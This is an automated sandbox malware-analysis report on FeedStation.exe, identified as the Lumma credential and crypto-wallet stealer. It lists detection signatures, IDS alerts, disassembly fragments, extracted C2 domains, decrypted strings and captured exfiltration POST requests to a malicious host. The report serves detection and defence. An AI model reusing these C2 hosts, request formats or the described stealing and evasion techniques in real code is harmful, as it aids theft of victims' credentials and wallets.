Edit tour

Windows Analysis Report
FeedStation.exe

Overview

General Information

Sample name:	FeedStation.exe
Analysis ID:	1587453
MD5:	256a1ccec403335433630f6824e081df
SHA1:	88abf0221a21e688971e4f746f802d86a86fe085
SHA256:	f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d
Tags:	exeLummaStealeruser-zhuzhu0009
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Performs DNS queries to domains with low reputation

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FeedStation.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\FeedStation.exe" MD5: 256A1CCEC403335433630F6824E081DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "ingreem-eilish.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz", "sordid-snaked.cyou"], "Build id": "HpOoIh--3fe7f419a360"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4ae6e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4e404:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: FeedStation.exe PID: 6416	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: FeedStation.exe PID: 6416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FeedStation.exe PID: 6416	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:14.264393+0100	2028371	3	Unknown Traffic	192.168.2.5	49773	104.102.49.254	443	TCP
2025-01-10T11:59:15.392088+0100	2028371	3	Unknown Traffic	192.168.2.5	49783	104.21.112.1	443	TCP
2025-01-10T11:59:16.390068+0100	2028371	3	Unknown Traffic	192.168.2.5	49791	104.21.112.1	443	TCP
2025-01-10T11:59:17.577909+0100	2028371	3	Unknown Traffic	192.168.2.5	49801	104.21.112.1	443	TCP
2025-01-10T11:59:18.757926+0100	2028371	3	Unknown Traffic	192.168.2.5	49807	104.21.112.1	443	TCP
2025-01-10T11:59:20.346697+0100	2028371	3	Unknown Traffic	192.168.2.5	49819	104.21.112.1	443	TCP
2025-01-10T11:59:21.716762+0100	2028371	3	Unknown Traffic	192.168.2.5	49829	104.21.112.1	443	TCP
2025-01-10T11:59:23.238401+0100	2028371	3	Unknown Traffic	192.168.2.5	49840	104.21.112.1	443	TCP
2025-01-10T11:59:24.286958+0100	2028371	3	Unknown Traffic	192.168.2.5	49847	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:15.822982+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49783	104.21.112.1	443	TCP
2025-01-10T11:59:16.846895+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49791	104.21.112.1	443	TCP
2025-01-10T11:59:24.807042+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49847	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:15.822982+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49783	104.21.112.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:16.846895+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49791	104.21.112.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.548954+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.5	58915	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.469485+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.5	62590	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.513175+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.5	61287	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.500882+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.5	50214	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.481736+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.5	53630	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.456229+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.5	57899	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.442100+0100	2058612	1	Domain Observed Used for C2 Detected	192.168.2.5	56548	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.581219+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.5	52281	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:13.537250+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.5	52814	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:18.100326+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49801	104.21.112.1	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T11:59:14.766792+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49773	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://sputnik-1985.com/api#	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/.	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/.mgmd	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api6C	Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api2	Avira URL Cloud: Label: malware

Found malware configuration

Source: FeedStation.exe.6416.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "ingreem-eilish.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz", "sordid-snaked.cyou"], "Build id": "HpOoIh--3fe7f419a360"}

Multi AV Scanner detection for submitted file

Source: FeedStation.exe	ReversingLabs: Detection: 55%
Source: FeedStation.exe	Virustotal: Detection: 63%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.2% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: ingreem-eilish.biz
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--3fe7f419a360

Source: FeedStation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49847 version: TLS 1.2

Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp al, 2Eh	0_2_025072D1
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ebx, ecx	0_2_024EE2E9
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then not eax	0_2_024F82AE
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_025183B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	0_2_0250D014
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp eax	0_2_024FC00A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then add edi, esi	0_2_0250C00F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov dword ptr [ecx], edx	0_2_024ED0B1
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp eax	0_2_02506159
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-292A76E2h]	0_2_0251D142
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ecx, eax	0_2_02501112
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_0250A11B
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then push eax	0_2_0251C131
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then add edx, ebp	0_2_024EA6D2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [esi], ax	0_2_0251C6AD
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [esi], ax	0_2_024FD772
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [esi], ax	0_2_024FD772
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp dword ptr [00442F0Ch]	0_2_02503733
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0251E4B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_025095D2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ecx, eax	0_2_024EC5D2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp eax	0_2_024FC5ED
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_025055B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov edi, dword ptr [esp+2Ch]	0_2_025055B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_024FF5B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov esi, eax	0_2_024FAA42
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_024FAA42
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then cmp byte ptr [eax+00447659h], 00000000h	0_2_024EFA6B
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	0_2_0251DA7A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_024F5AD2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	0_2_02506AA2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ecx, eax	0_2_02506AA2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp eax	0_2_024FC5E8
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then jmp eax	0_2_024FCAB1
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0250ABE2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02514BE2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then add edx, ebp	0_2_024EA892
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02508E5A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	0_2_0250CEC2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov dword ptr [ecx], edx	0_2_024ECEAF
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_024EDF5C
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]	0_2_0250CF4D
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1FE18C32h]	0_2_0251EFD2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov dword ptr [ecx], edx	0_2_024ECFCA
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ecx, eax	0_2_024F5FEE
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx ecx, word ptr [esp+eax*4+00001110h]	0_2_024E8FB2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	0_2_024E9CE2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0250CC8F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A0h]	0_2_0250CC8F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then mov ecx, esi	0_2_024F8CBA
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1FE18C32h]	0_2_0251ED02

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:50214 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:53630 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058612 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz) : 192.168.2.5:56548 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:62590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:61287 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:52814 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:58915 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:52281 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:57899 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49801 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49791 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49791 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49783 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49783 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49847 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49773 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: ingreem-eilish.biz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49791 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49801 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49819 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49807 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49829 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49847 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49840 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49783 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4PJXJRFRQIXUO72KPWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3E7H6T7CJBZEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8C5WVK0D5HPZHE5XLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=46HK5RMUNYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6WJTG6236WX8EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1101Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: sputnik-1985.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

